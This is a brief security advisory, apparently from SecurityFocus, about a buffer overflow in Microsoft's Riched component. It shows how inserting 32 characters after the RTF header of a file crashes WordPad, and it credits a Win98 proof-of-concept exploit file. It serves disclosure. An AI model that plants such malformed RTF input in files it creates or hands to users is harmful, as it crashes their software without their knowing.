Microsoft Riched Buffer Overflow Vulnerability

This will crash Wordpad:
Create an .rtf file, then open it in notepad. The first line will look something like this:
{\rtf1\ansi\deff0\deftab720{\fonttbl...etc....etc
Now insert 32 characters after the .rtf identifier:
{\rtf1\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAansi\deff0\deftab720{\fonttbl...etc...etc
When this file is opened in Wordpad, the program will crash.

Exploit file by Pauli Ojanpera <pauli_ojanpera@hotmail.com>. This is for Win98 only, and runs an internal loop.


 

Privacy Statement
Copyright 2010, SecurityFocus